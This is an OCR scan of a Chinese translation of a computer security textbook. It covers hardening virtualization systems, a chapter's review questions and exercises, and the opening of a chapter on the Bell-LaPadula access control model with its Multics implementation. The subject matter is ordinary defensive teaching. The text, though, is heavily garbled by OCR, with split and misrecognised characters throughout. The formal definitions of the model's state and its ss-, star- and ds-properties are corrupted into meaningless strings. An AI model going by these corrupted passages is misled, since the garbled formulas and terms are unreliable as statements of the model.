© 加 固 全 虚拟 化 解决 方案 的 所 有 元 素 ， 包 括 管理 程序 、 客 机 操作 系统 、 虚 拟 化 架构 ， 并 

且 维 护 它们 的 安全 。 

e 确保 管理 程序 经 过 了 正确 的 加 固 。 

© 限制 和 保护 管理 员 对 虚拟 化 解决 方案 的 访问 。 

正如 我 们 在 本 章 前 面 提 到 的 ， 很 明显 可 以 看 到 这 就 是 系统 加 固 过 程 的 一 个 扩展 。 

管理 程序 安全 管理 程序 应 该 使 用 类 似 加 固 操作 系统 的 方法 进行 加 固 。 也 就 是 说 ， 它 应 该 
通过 干净 的 媒介 在 隔离 的 环境 下 安装 ， 并 且 打 上 最 新 的 补丁 以 减少 漏洞 的 数量 。 之 后 应 该 给 它 
配置 自动 更 新 ， 禁 用 或 者 删除 所 有 不 需要 的 服务 ， 断 开 没 用 的 硬件 设备 ， 客 机 操作 系统 应 该 有 
适当 的 自 检 人 能力， 应 该 时 刻 监控 管理 程序 以 及 时 发 现 被 攻击 的 信号 。 

应 该 仅 允 许 授权 的 管理 员 访 问 管理 程序 ， 因 为 访问 管理 程序 的 这 些 人 可 以 访问 和 监视 任何 
客机 操作 系统 。 管 理 程序 可 以 支持 本 地 和 远程 管理 。 这 一 定 要 正确 配置 ， 并 使 用 合适 的 身份 认 
证 和 加 密 机 制 ， 尤 其 是 使 用 远程 管理 的 情况 下 。 远 程 管理 访问 应 该 在 网 络 防火 墙 和 IDS 的 控 
制 范围 内 进行 。 理 想 状 态 下 ， 如 果 可 能 的 话 ， 这 种 管理 行为 应 该 使 用 独立 的 网 络 ， 该 网 络 只 有 
非常 有 限 的 外 部 访问 权限 。 

虚拟 化 架构 安全 ”虚拟 化 系统 管理 着 对 硬盘 和 网 络 这 类 硬件 资源 的 访问 。 这 些 访问 权限 应 
该 被 限制 为 只 有 使 用 硬件 资源 的 客机 操作 系统 拥有 。 正 如 我 们 先前 提 到 的 ， 网 络 接口 的 配置 和 
内 部 虚拟 网 络 的 使 用 可 能 会 为 组 织带 来 新 的 问题 ， 因 为 组 织 希 望 能 够 监控 到 系统 之 间 的 所 有 流 
量 。 这 些 内 容 应 该 作为 安全 需求 被 设计 和 处 理 。 

对 虚拟 机 镜像 和 快照 的 访问 应 该 受到 严格 控制 ， 因 为 这 是 潜在 受 攻击 的 地 方 。 

主机 虚拟 化 安全 ”通常 用 在 客户 端 中 的 主机 虚拟 化 系统 也 带 来 了 一 些 额外 的 安全 问题 。 这 
些 问 题 是 由 主机 操作 系统 内 ， 其 他 应 用 程序 旁 的 管理 程序 以 及 客机 操作 系统 所 带 来 的 。 因 此 有 
更 多 的 层 需要 加 固 。 进 一 步 讲 ， 这 种 系统 的 用 户 通常 对 管理 程序 和 虚拟 机 镜像 以 及 快照 有 全 部 
的 访问 和 配置 权限 。 在 这 种 情况 下 ， 虚 拟 化 的 使 用 主要 是 为 了 提供 额外 的 特性 以 及 支持 多 个 操 
作 系 统 和 应 用 的 使 用 ， 而 不 是 将 各 个 系统 互相 隔离 给 不 同 的 用 户 使 用 。 

设计 一 个 对 于 用 户 来 说 访问 和 修改 更 为 安全 的 主机 系统 和 虚拟 化 方案 是 可 行 的 。 这 种 方法 
可 以 用 来 支持 全 方位 加 固 的 客机 操作 系统 镜像 ， 用 来 提供 对 企业 网 络 和 数据 的 访问 ， 用 来 支持 
这 些 镜像 的 统一 管理 和 更 新 。 然 而 ， 除 非 经 过 充分 的 加 固 和 管理 ， 否 则 这 种 底层 操作 系统 之 上 
的 主机 虚拟 化 方案 仍然 会 存在 安全 问题 。 


12.9 ”推荐 读物 


[SCAR08] 给 出 了 本 章 讨论 的 一 般 意 义 的 服务 器 安全 通用 指导 。[SCAR11] 给 出 了 加 固 虚 拟 
化 系统 的 指导 。 


SCAR08 Scarfone. K.; Jansen, W.; and Tracy, M. Guide to General Server Security, NIST 
Special Publication 800-123, July 2008. 

SCAR11 Scarfone, K.: Souppaya, M.; and Hoffman, M. Guide to Security for Full Virtu- 
alization Technologies, NIST Special Publication 800-125, January 2011. 
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12.10 ”关键 术语 、 复 习题 和 习题 


12.7 

12.8 

12.9 

12.10 
12.11 
12.12 
12.13 
12.14 
12.15 
12.16 
12.17 
12.18 
12.19 
12.20 
12.21 
12.22 
12.23 
12.24 
12.25 
12.26 


习题 
12.1 


关键 术语 
access controls (访问 控制 ) hypervisor (管理 程序 ) 
administrators (管理 员 ) logging (日 志 ) 
application virtualization 〈 应 用 虚拟 化 ) native virtualization (本 地 虚拟 化 ) 
archive (存档 ) patches (补丁 ) 
backup (备份 ) patching ( 打 补丁 ) 
full virtualization (全 虚拟 化 ) permissions (权限 ) 
guest OS (客机 操作 系统 ) virtual machine monitor (虚拟 机 监视 器 ) 
hardening (加 固 ) virtualization (虚拟 化 ) 
-hosted virtualization (主机 虚拟 化 ) 
复习 题 
121 ”加固 系统 的 基本 步骤 是 什么 ? 
12.2 系统 安全 规划 的 目的 是 什么 ? 
12.3 加固 基 本 操作 系统 的 基本 步骤 是 什么 ? 
12.4 ”为 什么 让 所 有 软件 尽快 更 新 如 此 重要 ? 
12.5 ”自动 更 新 的 优势 和 劣势 是 什么 ? 
12.6 移 除 不 必要 的 服务 、 应 用 和 协议 有 什么 意义 ? 


用 于 加 固 基本 操作 系统 的 额外 安全 工具 都 有 哪些 ? 

用 于 加 固 关键 应 用 的 额外 步骤 是 什么 ? 

用 来 维护 系统 安全 的 步骤 是 什么 ? 

在 UNIX 和 Linux 系统 中 ， 应 用 和 服务 的 配置 信息 在 什么 地 方 ? 

在 UNIX 和 Linux 系统 中 ， 实 现 了 什么 样 的 访问 控制 模型 ? 

权限 是 什么 ? 用 在 哪里 ? 

在 UNIX 和 Linux 系统 中 ， 什 么 命令 可 以 用 来 操作 访问 控制 列表 ? 

#£ UNIX 和 Linux 系统 中 执行 文件 时 ， 设 置 用 户 和 用 户 组 会 产生 什么 影响 ? 
在 Linux 系统 中 ， 主 要 使 用 的 主机 防火 墙 程序 是 什么 ? 

滚动 日 志文 件 为 何 重要 ? 

chroot 监牢 怎样 提高 应 用 的 安全 性 ? 

在 Windows 系统 中 ， 用 户 和 组 信息 存在 哪 两 个 地 方 ? 

在 UNIX/Linux 系统 和 在 Windows 系统 中 ， 访 问 控制 模型 的 实现 有 什么 主要 区 别 ? 
在 Windows 系统 中 使 用 的 强制 完整 性 控制 是 什么 ? 

在 Windows 系统 中 ， 什 么 特权 能 覆盖 所 有 的 ACL MH, Atta? 

在 Windows 系统 中 ， 应 用 和 服务 的 配置 信息 保存 在 哪里 ? 

什么 是 虚拟 化 ? 

我 们 讨论 了 什么 虚拟 化 加 固 方案 ? 

虚拟 化 系统 中 主要 的 安全 问题 是 什么 ? 

加 固 虚 拟 化 系统 的 基本 步骤 是 什么 ? 


陈述 在 系统 中 进程 以 管理 员 或 root 权限 运行 时 可 能 产生 的 威胁 。 
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12.2 用户 设 置 (setuid) 和 组 设置 (setgid) 程序 是 由 UNIX 用 于 管理 敏感 资源 访问 所 支持 的 一 个 强大 机 制 ， 
然而 其 中 的 潜在 安全 漏洞 可 能 会 危机 整个 系统 。 描 述 一 个 可 用 于 定位 所 有 用 户 设置 或 组 设置 的 程 
FF, 并 说 明 如 何 利用 这 些 信息 。 

12.3 ”为 什么 文件 系统 权限 在 Linux DAC 模型 中 如 此 重要 ? 这 和 Subject-Action-Object 事务 的 概念 有 什么 
对 应 关系 ? 

12.4 FAP ahmed 拥有 一 个 目录 stuff， 其 中 包含 名 为 ourstuff.txt 的 文本 文件 ， 该 文件 由 sta 任 组 所 共享 。 
组 内 的 这 些 用户 可 以 读 取 并 更 改 该 文件 ， 但 是 不 能 删除 它 。 也 不 能 在 本 目录 下 创建 新 文件 。 其 他 
组 的 用 户 不 可 以 访问 该 目录 。 那 么 ， 该 如 何 设 置 目录 stuff 和 文件 ourstuffext 的 所 有 者 权限 ? 

12.5 假设 你 正在 管理 Apache Linux Web 服务 器 上 你 公司 的 电子 交易 网 站 ， 有 一 个 名 为 WorminatorX 的 
蠕虫 病毒 利用 Apache Web 服务 包 中 的 缓冲 区 溢出 漏洞 获取 到 了 主机 远程 root 权限 。 构 建 一 个 简单 
的 安全 威胁 模型 ， 描 述 其 中 的 威胁 : 攻击 者 、 攻 击 向 量 、 漏 洞 、 资 源 、 产 生 的 影响 和 合理 的 规避 
方法 。 

12.6 为 什么 日 志 系 统 非常 重要 ? 它 作为 安全 控制 工具 有 什么 限制 ? 记录 远程 日 志 有 什么 优势 和 劣势 ? 

12.7 考虑 一 个 自动 的 审计 日 志 分 析 工 具 ， 能 提出 哪些 可 用 于 识别 系统 中 可 疑 行为 的 规则 ? 

12.8 ”使 用 文件 完整 性 检查 工具 的 优势 和 劣势 是 什么 ? 该 工具 将 任何 文件 的 变更 情况 通知 管理 员 。 考 虑 
一 下 ， 哪 些 文件 你 希望 它 的 变更 尽量 少 一 些 ， 哪 些 文件 可 能 经 常 变更 。 讨 论 哪些 因素 影响 该 工具 
的 配置 ,文件 系统 的 哪些 部 分 被 扫描 ， 监 控 其 响应 的 工作 量 有 多 大 ? 

12.9 ”有些 人 认为 UNIX/Linux 操作 系统 在 很 多 场景 下 复 用 一 些 安全 特性 ， 而 Windows 操作 系统 针对 不 
同 的 安全 场景 提供 针对 性 的 安全 特性 。 这 是 在 简易 性 但 缺乏 灵活 性 与 复杂 但 更 有 针对 性 之 间 的 权 
衡 。 讨 论 各 自 安 全 策略 对 系统 的 影响 ， 以 及 安全 管理 员 在 其 中 所 处 的 位 置 。 

12.10 {ÈH BitLocker 加 密 笔记 本 电脑 时 不 应 该 使 用 待机 模式 ， 而 推荐 使 用 睡眠 模式 ， 这 是 为 什么 ? 438 
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学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 ， 

解释 Bell-LaPadula 模型 及 其 与 可 信 计 算 的 相关 性 ; 

总 结 其 他 形式 化 的 计算 机 安全 模型 ; | 
理解 可 信和 系统 的 概念 ; 

列 出 并 解释 基准 监视 器 的 性 质 ， 解 释 基准 监视 器 与 安全 内 核 数据 库 的 关系 ; | 
概述 多 级 安全 在 基于 角色 的 访问 控制 和 数据 库 安 全 方面 的 应 用 ; 
讨论 可 信 计 算 的 硬件 方式 ; | 
解释 并 总 结 信息 技术 安全 评价 通用 准则 。 | 


本 章 涉及 与 用 户 和 实现 者 对 安全 功能 和 服务 的 信任 度 有 关 的 若干 相关 主题 : 
e 计算 机 安全 的 形式 化 模型 

© 多 级 安全 

© 可 信和 系统 

e 强制 访问 控制 

。 安全 评价 


13.1 计算 机 安全 的 Bell-LaPadula 模型 


13.1.1 计算 机 安全 模型 


两 个 历史 事实 都 强调 了 在 计算 机 安全 领域 需要 解决 一 个 基本 问题 。 首 先 ， 所 有 复杂 的 软 
件 系统 最 终 都 会 暴露 出 缺陷 或 错误 ， 需 要 随后 修复 。 这 方面 的 精彩 论述 可 在 经 典 的 《人 月 神 
话 》[BROO95] 中 看 到 。 其 次 ， 要 想 构建 一 个 不 易于 遭受 各 种 安全 攻击 的 计算 机 硬件 /软件 系 
统 是 一 件 非 常 困难 的 事情 。 微 软 在 20 世纪 90 年 代 开发 的 Windows NT 操作 系统 证 明了 其 难 
BE. Windows NT 承诺 具有 高 度 的 安全 性 ， 远 胜 于 包括 微软 的 Windows 3.0 和 很 多 其 他 个 人 计 
算 机 、 工 作 站 和 服务 器 操作 系统 在 内 的 以 前 的 操作 系统 。 可 惜 的 是 Windows NT 并 没有 兑现 这 
个 诺言 。 这 个 操作 系统 及 其 后 继 Windows 版 本 长 期 遭受 各 种 安全 漏洞 的 困扰 。 
ka 与 提供 强大 的 计算 机 安全 有 关 的 问题 涉及 设计 和 实现 两 方面 。 设 计 出 任何 能 确保 真正 提 
440| 供 期 望 安全 级 别 的 硬件 或 软件 模块 都 是 很 困难 的 。 这 种 困难 导致 出 现 很 多 意 想不到 的 安全 脆弱 
性 。 即 使 设计 在 某 种 意义 上 是 正确 的 ， 倘 若 另 一 台 主 机 有 脆弱 性 ， 也 很 难 没有 差错 或 没有 bug 
地 实现 这 个 设计 。 
这 些 问题 导致 需要 开发 一 种 能 在 逻辑 上 或 数学 上 证 明 这 种 设计 确实 满足 一 组 规定 的 安全 要 
求 且 其 实现 忠实 遵循 设计 规范 的 方法 。 为 了 达到 这 个 目的 ， 安 全 研究 者 已 经 努力 开发 出 一 些 可 
以 用 来 验证 安全 设计 与 实现 的 计算 机 安全 形式 化 模型 。 
这 个 领域 的 研究 最 初 是 由 美国 国防 部 资助 的 ， 他 们 在 开发 模型 和 将 模型 运用 到 原型 系统 
方面 取得 了 很 多 进展 。 由 于 必须 试图 建立 复杂 系统 的 形式 化 模型 ， 资 助 已 经 大 大 减少 。 然 而 ， 
这 些 模型 在 提供 规范 的 、 一 致 的 定义 设计 安全 要 求 的 方法 方面 是 有 价值 的 [BELL05]。 本 节 我 
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们 介绍 可 能 是 最 有 影响 的 计算 机 安全 模型 一 Bell-LaPadula (BLP) 模型 [BELL73, BELL75]. 
其 他 几 个 模型 在 13.2 节 分 析 。 


13.1.2 一 般 描述 


BLP 模型 是 20 世纪 70 年 代 作 为 访问 控制 的 形式 化 模型 开发 出 来 的 。 该 模型 依赖 于 第 4 
章 描述 的 访问 控制 概念 (如 图 4-4 所 示 )。 在 模型 中 ， 每 个 主体 和 每 个 客体 都 被 分 配 一 个 安全 
类 (security class)。 在 最 简单 的 表述 中 ， 安 全 类 形成 严格 的 层次 结构 ， 称 为 安全 级 别 ( security 
level)。 一 个 例子 是 美国 军 方 的 密级 划分 方案 : 
绝密 级 (top secret) > 机 密级 (secret) > 秘密 级 (confidential) 
> 内 部 级 (restricted) > 公开 级 (unclassified) 
我 们 还 能 给 每 个 安全 级 别 增加 一 组 范畴 ( category) 或 分 割 ( compartment)， 这 样 每 个 主体 
必须 被 分 配 访问 客体 所 需 的 正确 级 别 和 范畴 。 在 下 面 的 讨论 中 我 们 忽略 了 这 一 精细 要 求 。 
安全 级 别 的 概念 ， 同 样 适用 于 其 他 可 以 将 信息 分 成 粗略 级 别 和 范畴 并 为 用 户 授予 访问 某 一 
范畴 数据 的 许可 的 领域 。 例 如 ， 最 高 安全 级 别 可 以 对 应 于 仅 能 被 公司 高 管 及 其 下 属 访问 的 战略 
性 的 公司 规划 文件 和 数据 ; 下 一 个 安全 级 别 应 该 是 仅 能 为 行政 人 员 、 公 司 高 管 等 访问 的 财务 和 
人 事 方面 的 敏感 数据 。 这 就 提出 了 下 面 的 密级 方案 
战略 级 > 敏感 级 > 秘密 级 > 公开 级 
主体 具有 指定 级 别 的 安全 许可 (security clearance)， 客 体 具 有 指定 级 别 的 安全 等 级 
( security classification) 。 安 全 类 控制 主体 访问 客体 的 方式 。 该 模型 定义 了 四 种 访问 模式 ， 不 过 
其 发 明 者 指出 在 特定 的 实施 环境 中 ， 可 以 使 用 与 之 不 同 的 一 组 模式 。 这 些 模式 如 下 : 
© 读 (read): 主体 仅 被 允许 对 客体 读 访问 。 
o 追加 (append): 主体 仅 被 允许 对 客体 写 访问 。 
e 写 (write): 主体 被 允许 对 客体 读 、 写 访问 。 
e HUT (execute): 主体 不 被 允许 对 客体 读 或 写 访问 ， 但 可 以 调用 客体 执行 。 
当 需 要 定义 数据 的 多 个 范畴 或 级 别 时 ， 这 个 要 求 被 称 为 多 级 安全 (multilevel security), Xf 
以 保密 性 为 中 心 的 多 级 安全 的 要 求 的 一 般 表 述 为 : 高 级 别 的 主体 不 会 把 信 1 
主体 ， 除 非 该 信息 流 能 准确 反映 获得 解密 <= 
授权 的 授权 用 户 的 意愿 。 为 了 实现 多 级 安 
全 机 制 ， 该 要 求 被 分 成 两 部 分 来 简单 表述 。 
要 求 保密 性 的 多 级 安全 系统 必须 执行 : 
e 不 上 读 (no read up): 主体 只 能 读 取 
相同 或 者 更 低 安全 级 别 的 客体 。 这 
在 文献 中 称 为 简单 安全 性 (simple 
security property, ss 特性 )。 
e 不 下 写 (no write down): 主体 只 能 
写 人 相同 或 者 更 高 安全 级 别 的 客 
体 ， 这 在 文献 中 称 为 *- 特 性 9 
(*-property， 读 作 “ 星 特性 ”)。 
13-1 说 明了 *- 特性 的 必要 。 这 里 ， 图 13-1 说 明 *- 特性 必要 性 的 信息 流 





可 的 恶意 主 


O “*” 并 不 指 代 任何 事物 。 在 编写 该 模型 的 第 一 份 报告 时 ， 没 人 能 为 该 特性 想 出 一 个 恰当 的 名 字 。 星 号 是 在 
草案 中 输入 的 多 余 字 符 ， 其 目的 是 一 旦 该 特性 被 命名 ， 文 本 编辑 器 就 能 迅速 找到 并 替换 所 有 的 星 号 。 由 于 
一 直 没 有 想 出 名 字 ， 所 以 报告 就 保留 着 “* ”发 表 了 。 
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恶意 主体 传递 机 密 信 息 ， 将 其 放 人 安全 等 级 比 信息 本 身 更 低 的 信息 容器 中 。 这 将 允许 低 许可 级 
别 的 主体 随后 读 取 该 信息 。 
这 两 个 特性 规定 了 强制 访问 控制 (MAC) 的 保密 性 形式 。 在 这 种 MAC 要 求 下 ， 不 满足 这 
两 个 特性 的 访问 不 被 允许 。 此 外 ，BLP 模型 还 规定 了 自主 访问 控制 (DAC). 
e ds- 特性 ( ds-property) : 一 个 个 体 (或 角色 ) 可 以 基于 文件 属 主 的 判断 、 在 MAC 规则 
的 约束 下 授予 另 一 个 个 体 (或 角色 ) 对 一 个 文件 的 访问 权 。 因 而 ， 主 体 只 能 执行 其 具有 
必要 的 授权 且 满 足 MAC 规则 的 访问 。 
其 基本 思想 是 位 置 策略 覆盖 所 有 自主 访问 控制 。 也 就 是 说 ， 用 户 不 能 把 数据 泄露 给 非 授权 
人 员 。 


13.1.3 ”模型 的 形式 化 描述 


我 们 使 用 [BELL75] 中 提出 的 表示 法 。 模 型 基于 “系统 当前 状态 ”这 一 概念 。 状 态 用 四 元 
组 (b, Mf, H) 描述 ， 定义 如 下 : 
e 当前 访问 集 5b: 形 如 (主体 ， 客体 ,访问 方式 ) 的 三 元 组 的 集合 。 三 元 组 (s, o, a) 表示 
主体 s 以 访问 方式 a 对 客体 o 进行 当前 访问 。 注 意 这 并 不 单纯 表示 s 具有 对 o 的 访问 
Ha, MERR s 当前 正 行使 访问 权 ， 就 是 * 正 以 方式 a 访问 o。 
e 访问 矩阵 M : 访问 矩阵 具有 第 4 章 所 表示 的 结构 。 和 矩阵 元 素 Mi 记录 主体 8 被 允许 对 
客体 0; 的 访问 方式 。 
© 级 别 函数 /: 该 函数 给 每 个 主体 和 客体 分 配 一 个 安全 级 别 。 它 包含 三 个 映射 : h0) 是 
客体 Ci; WR, A 是 主体 S MRSA, £(S) BERS 的 当前 安全 级 别 。 主 体 的 
安全 许可 是 主体 的 最 大 安全 级 别 ， 主 体 可 以 运行 于 该 级 别 或 更 低级 别 。 这 样 ， 用 户 可 
以 以 低 于 其 安全 许可 的 级 别 登 录 系统 。 这 对 基于 角色 的 访问 控制 系统 特别 有 用 。 
e BXH: 一 棵 有 向 有 根 树 ， 其 结 点 对 应 于 系统 中 的 客体 。 模 型 要 求 客体 的 安全 级 别 必 
AEF (dominate) 于 其 父 结 点 的 安全 级 别 。 针 对 我 们 的 讨论 ， 我 们 可 以 将 其 等 同 于 客 
体 的 安全 级 别 必须 大 于 或 等 于 其 父 结 点 的 安全 级 别 9。 
我 们 现在 可 以 更 形式 化 地 定义 BLP 的 三 个 特性 。 对 于 每 个 主体 % 和 每 个 客体 O, WEW 
FER: 
o ss- 特性 : “SRT b 中 的 每 个 形 如 (5, O, 读 ) 的 元 组 具有 性 质 上 (S) 壹 广 (O)。 
o * 特性 : 当前 访问 集 5b 中 的 每 个 形 如 (S, O, 追加 ) HARA ASSO 4 
前 访问 集 b 中 的 每 个 形 如 (5;, O,, 写 ) 的 元 组 具有 性 质 上 CS) 三 f(O))。 
o ds- 特性 : WR (S, O, 4:) 是 当前 访问 (EDP), 那么 访问 方式 4; 被 记录 在 M 的 
(S, O) 元 素 中 。 也 就 是 说 ，(S O, A) 意味 着 4.EMI[S, Olo 
这 三 个 特性 可 以 用 来 定义 一 个 保密 性 安全 系统 。 大 体 上 ， 一 个 安全 系统 具有 下 列 特征 : 
1. 系统 的 当前 安全 状态 (b, M, 6H) BREN, MENA b 的 每 个 元 素 都 满足 这 三 个 特性 。 
2. 任何 导致 系统 四 个 分 量 (b, M, fH) 中 的 任何 一 个 发 生变 化 的 操作 ， 都 将 改变 系统 的 安 
全 状态 。 
3. 安全 系统 将 保持 安全 ， 只 要 任何 状态 变化 均 不 违反 这 三 个 特性 。 、 
[BELL75] 说 明了 如 何 采 用 形式 化 模型 将 以 上 三 点 表示 为 定理 。 而 且 ， 只 要 给 出 一 个 实际 
的 设计 或 实现 ， 理 论 上 都 可 以 通过 证 明 影 响 系统 状态 的 任何 动作 满足 三 个 特性 来 证 明 系统 是 安 


O 优势 的 概念 允许 同时 涉及 安全 级 别 和 分 割 二 者 的 更 复杂 的 安全 等 级 结构 。 这 项 军事 领域 形成 的 精细 要 求 对 
于 我 们 的 讨论 并 不 是 必需 的 。 
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全 的 。 实 践 中 ， 对 于 一 个 复杂 的 系统 ， 从 未 完全 实现 这 种 证 明 。 然 而 ， 正 如 前 面 提 到 的 ， 形 式 
化 要 求 可 以 带 来 更 安全 的 设计 与 实现 。 


13.1.4 ”抽象 操作 


BLP 模型 在 能 够 改变 系统 状态 的 抽象 操作 基础 上 设计 了 一 组 规则 。 这 组 规则 如 下 : 

1. 获得 访问 : 添加 三 元 组 (主体 ， 客 体 ， 访 问 方式 ) 到 当前 访问 集 5。 供 主体 用 来 以 所 需 
方式 初始 化 对 客体 的 访问 。 

2. 释放 访问 : 在 当前 访问 集 4b 中 删除 三 元 组 (主体 ， 客 体 ， 访 问 方 式 )。 用 来 释放 以 前 初 
始 化 的 访问 。 

3. 改变 客体 级 别 : 改变 某 个 客体 O HY (0) 值 。 供 主体 用 来 修改 客体 的 安全 级 别 。 

4. 改变 当前 级 别 : 改变 某 个 主体 S 的 人 (5) 值 。 供 主体 用 来 修改 主体 的 安全 级 别 。 

5. 给 予 访问 许可 : 添加 访问 方式 到 访问 许可 矩阵 M 的 某 个 项 。 供 主体 用 来 为 另 一 个 主体 
授予 对 指定 客体 的 访问 方式 。 

6. 废除 访问 许可 : 删除 W 的 某 个 项 中 的 访问 方式 。 供 主体 用 来 收回 以 前 授予 的 访问 权 。 

7. 创建 客体 : 将 一 个 客体 附加 到 当前 树 结构 五 作为 叶子 。 用 来 创建 一 个 客体 或 者 激活 一 
个 已 被 定义 但 由 于 未 被 插入 五 而 未 被 激活 的 客体 。 

8. 删除 客体 组 : 从 万 中 移 除 一 个 客体 及 层次 结构 中 位 于 其 下 方 的 所 有 其 他 客体 。 该 操作 
使 得 客体 组 不 活动 。 该 操作 还 由 于 对 客体 的 所 有 访问 被 释放 而 需 修 改 当 前 访问 集 bo 

规则 1 和 2 用 来 改变 当前 访问 ， 规 则 3 和 4 用 来 改变 级 别 函数 ， 规 则 5 和 6 用 来 改变 访问 
许可 ， 规 则 7 和 8 用 来 改变 层次 结构 。 每 个 规则 都 受 控 于 三 个 特性 的 应 用 。 例 如 ， 为 了 获取 读 
访问 权 ， 必 须 有 大 (8) Zf) H Are M[S, O. 


13.1.5 BLP 应 用 实例 


这 个 实例 说 明了 BLP 模型 的 运行 过 程 ， 并 强调 了 一 个 必须 解决 的 实际 问题 。 我 们 假定 有 
一 个 基于 角色 的 访问 控制 系统 ; Carla 和 Dirk 是 系统 的 用 户 ; Carla 是 课程 cl 的 学 生 ; Dirk 是 
课程 cl 的 教师 ， 但 也 可 以 作为 学 生 访问 系统 。 这 样 Dirk 被 分 配 两 个 角色 

Carla: (cl-s) 
Dirk: (cl-t), (cl-s) 

学 生 和 角色 被 分 配 较 低 安全 许可 而 教师 角色 被 分 配 较 高 安全 许可 。 我 们 来 看 几 个 可 能 的 动作 : 

1. Dirk 作为 cl1-t 创 建新 文件 位 ，Carla 作为 cl-s 创建 文件 2 (参见 图 13-2a) Carla 可 以 
读 、 写 刀 ， 但 不 能 读 fl， 因 为 和 处 于 较 高 密级 (教师 级 别 )。Dirk 在 cl-t 角色 可 以 读 、 写 fi, 
也 能 读 f2, MIRA Carla 授予 亿 访问 权 的 话 。 然 而 ， 由 于 *- 特性 ，Dirk 不 能 在 这 个 角色 写 2. 
不 管 是 Dirk 还 是 以 他 名 义 出 现 的 特洛伊 木马 都 不 能 把 数据 从 教师 级 别 降 低 到 学 生 级 别 。 仅 当 
Dirk 以 学 生 角 色 登 录 时 ， 他 才能 创建 cl-s 文件 或 写 已 存在 的 cl-s 文件 (CN £2). Dirk 在 学 生 角 
色 也 能 读 亿 。 

2. Dirk 读 £2 并 想 创建 包含 Carla 的 评语 的 新 文件 作为 反馈 。Dirk 必须 以 学 生 角 色 cl-s 登录 
并 创建 B, LE Carla 能 够 访问 ( 见 图 13-2b)。Dirk 在 教师 角色 不 能 创建 处 于 学 生 密 级 的 文件 。 

3. Dirk 基于 已 存在 的 处 于 cl-t 密级 的 模板 文件 创建 考试 。Dirk 必须 以 clt 角色 登录 ， 读 
取 模 板 ， 他 创建 的 文件 (f4) 必须 也 处 于 教师 级 别 ( 见 图 13-2c)。 

4. Dirk 想 让 Carla 参加 考试 ， 因 此 必须 使 其 具有 读 访问 权 。 然 而 ， 这 个 访问 将 违背 ss- 特 
性 。Dirk 必须 将 f4 的 密级 从 cl-t 降低 到 cl-so Dirk 不 能 在 cl-t 角色 完成 这 个 工作 ， 因 为 这 将 
违背 *- 特性 。 因 此 ， 安 全 管理 员 (可 能 是 处 于 这 个 角色 的 Dirk) 必须 降低 权力 ， 而 这 必须 在 


[445] 
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BLP 模型 之 外 完成 。 图 13-2d 中 连接 £4 与 c1-s-read 的 虚线 表示 该 连接 不 能 由 默认 的 BLP 模型 
产生 ， 只 能 由 系统 操作 产生 。 

5. Carla 将 考试 答案 写 人 文件 f5 WENE cl-t 密级 的 文件 ， 只 能 由 Dirk 阅读 。 这 是 一 个 向 上 
写 的 例子 ， 并 不 被 BLP 模型 禁止 。Carla 仍然 可 以 在 她 的 工作 站 查看 其 答案 ， 但 不 能 读 取 f5. 

这 个 讨论 说 明了 BLP 模型 的 一 些 关 键 的 实际 限制 。 首 先 ， 正 如 步骤 4 所 指出 的 ，BLP 模 
型 没有 提供 对 客体 “降级 ”的 管理 ， 即 使 多 级 安全 要 求 承 认 ， 可 以 请 求 这 种 从 高 级 到 低级 的 信 
息 流 ， 只 要 其 反映 了 授权 用 户 的 意愿 。 因 而 ， 任 何 实 际 的 多 级 系统 的 实现 都 必须 支持 这 样 一 个 
处 于 受 控 、 受 监视 模式 的 进程 。 有 关 这 方面 的 内 容 是 另外 一 个 话题 了 。 受 BLP 模型 约束 的 主 
体 只 能 在 一 个 安全 级 别 “ 编 辑 ”( 读 和 写 ) 一 个 文件 ， 而 在 相同 或 更 低 的 级 别 查 看 文件 。 如 果 新 
文档 合并 了 来 自 不 同 来 源 和 级 别 的 信息 ， 那 么 其 中 某 些 信息 现在 的 密级 就 会 比 原来 的 高 。 这 被 
PRE “FFAMEF+ (classification creep)， 其 是 管理 多 级 信息 时 一 个 需要 普遍 关心 的 问题 。 再 次 ， 
需要 可 控 的 信息 降级 过 程 来 恢复 合理 的 密级 。 





b) 添加 第 三 个 文件 : f3:cl-s 
Kl 13-2 BLP 概念 应 用 实例 
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e) Caria 给 出 的 答案 仅 能 被 老师 访问 : f5:c1-t 
13-2 ( 续 ) 
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13.1.6 ”实现 实例 一 一 Multics 


[BELL75] 概括 介绍 了 MLS 在 Multics 操作 系统 上 的 一 种 实现 。 我 们 首先 对 Multics 的 相 
关 背 景 进行 简单 介绍 。 

Multics 是 由 MIT 的 MAC ( Multiple-Access Computer， 多 访问 计算 机 ) 项 目 组 于 20 世纪 
60 年 代 开 发 的 分 时 操作 系统 。Mnultics 超前 于 它 的 时 代 不 是 几 年， 而 是 数 十 年 。 即 使 到 了 20 tt 
纪 80 年 代 中 期 ，Multics 已 投入 运行 大 约 20 年 ， 它 与 同期 其 他 大 型 机 操作 系统 相 比 依然 具有 
更 优越 的 安全 特征 并 在 用 户 接口 和 其 他 方面 设计 也 更 为 复杂 。 

Multics 的 存储 器 管理 和 文件 系统 都 基于 段 的 概念 。 虚 拟 存储 器 是 分 段 的 。 对 于 大 多 数 硬 
件 平 台 ， 也 采用 分 页 技术 。 任 何 情况 下 ， 进 程 的 工作 空间 都 被 分 配给 一 个 段 ， 进 程 也 可 以 在 执 
行 时 创建 一 个 或 多 个 数据 段 。 这 样 OS 采用 同样 的 机 制 将 数据 段 和 文件 从 虚拟 存储 器 加 载 到 
内 存 。 段 按 层 次 结构 排列 ， 从 根 目 录 向 下 到 每 个 段 。 

Multics 通过 描述 符 段 管 理 虚 拟 地 址 空间 。 描 述 符 段 与 进程 关联 ， 进 程 可 访问 的 虚拟 存储 
器 中 的 每 个 段 都 在 段 描述 符 中 有 一 项 对 应 。 描 述 符 段 基 址 寄存 器 指向 当前 正在 执行 的 进程 的 描 
述 符 段 的 起 始 位 置 。 描 述 符 项 包括 指向 虚拟 存储 器 中 段 起 始 位 置 的 指针 及 保护 信息 。 保 护 信息 
以 读 、 写 、 执 行 位 的 形式 出 现 ， 其 可 以 被 单独 设置 为 ON 或 OFF。 段 描述 符 中 的 保护 信息 来 源 
于 段 的 访问 控制 表 。 

MLS 要 求 两 个 额外 的 特征 。 进 程 级 别 表 包 括 对 应 每 个 活动 进程 的 项 ， 该 项 表示 进程 的 安 
全 许可 。 与 每 个 段 关 联 的 是 安全 级 别 ， 存 储 在 该 段 的 父 目录 上 段 中 。 

与 BLP 模型 (b, M, f H) 的 安全 状态 对 应 的 是 Multics 数据 结构 集 ( 见 图 13-3 )。 对 应 关系 
如 下 : 

